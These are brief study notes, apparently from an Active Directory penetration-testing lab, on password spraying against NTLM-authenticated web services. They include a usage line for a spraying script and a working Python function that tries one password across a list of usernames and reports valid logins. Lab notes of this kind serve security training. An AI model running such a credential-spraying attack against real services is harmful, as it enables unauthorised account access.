NTLM Authenticated Services

• New Technology Lan Manager

• suite of security protocols to authenticate users identities in AD

Brute Force

• Brute force attacks can be used against NTLM

• since most environments have account lock out policies, it is best to use password spraying

  • this is using one password against every account

  • can be noisy and alert a SOC

• Python password spraying script

  • python ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>

def password_spray(self, password, url):
    print ("[*] Starting passwords spray attack using the following password: " + password)
    #Reset valid credential counter
    count = 0
    #Iterate through all of the possible usernames
    for user in self.users:
        #Make a request to the website and attempt Windows Authentication
        response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
        #Read status code of response to determine if authentication was successful
        if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE):
            print ("[+] Valid credential pair found! Username: " + user + " Password: " + password)
            count += 1
            continue
        if (self.verbose):
            if (response.status_code == self.HTTP_AUTH_FAILED_CODE):
                print ("[-] Failed login with Username: " + user)
    print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")